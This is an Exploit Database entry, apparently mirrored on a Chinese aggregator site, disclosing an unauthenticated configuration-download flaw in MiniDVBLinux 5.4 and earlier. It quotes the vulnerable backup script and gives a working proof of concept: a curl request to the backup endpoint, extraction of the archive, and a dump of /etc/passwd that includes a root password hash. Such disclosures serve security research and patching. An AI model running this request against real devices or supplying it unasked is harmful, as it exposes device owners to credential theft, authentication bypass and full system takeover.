MiniDVBLinux <=5.4 - Config Download Exploit

• Exploit Database
• 36 阅读

• 作者： LiquidWorm
  日期： 2023-03-27
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51091/

• # Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
  # Exploit Author: LiquidWorm
  
  
  Vendor: MiniDVBLinux
  Product web page: https://www.minidvblinux.de
  Affected version: <=5.4
  
  Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
  way to convert a standard PC into a Multi Media Centre based on the
  Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
  Linux based Digital Video Recorder: Watch TV, Timer controlled
  recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
  via browser, and a lot more. MLD strives to be as small as possible,
  modular, simple. It supports numerous hardware platforms, like classic
  desktops in 32/64bit and also various low power ARM systems.
  
  Desc: The application is vulnerable to unauthenticated configuration
  download when direct object reference is made to the backup function
  using an HTTP GET request. This will enable the attacker to disclose
  sensitive information and help her in authentication bypass, privilege
  escalation and full system access.
  
  ====================================================================
  /var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
  ------------------------------------------------------------
  01: <?
  02: if [ "$GET_action" = "getconfig" ]; then
  03: . /etc/rc.config
  04: header "Content-Type: application/x-compressed-tar"
  05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
  06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
  07: cat /tmp/backup_config_$$.tgz
  08: rm -rf /tmp/backup_config*
  09: exit
  10: fi
  11: ?>
  12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>
  
  ====================================================================
  
  Tested on: MiniDVBLinux 5.4
   BusyBox v1.25.1
   Architecture: armhf, armhf-rpi2
   GNU/Linux 4.19.127.203 (armv7l)
   VideoDiskRecorder 2.4.6
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5713
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php
  
  
  24.09.2022
  
  --
  
  
  > curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
  > mkdir configdir
  > tar -xvzf config.tgz -C .\configdir
  > cd configdir && cd etc
  > type passwd
  root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
  daemon:!:1:1::/:
  ftp:!:40:2:FTP account:/:/bin/sh
  user:!:500:500::/home/user:/bin/sh
  nobody:!:65534:65534::/tmp:
  _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
  >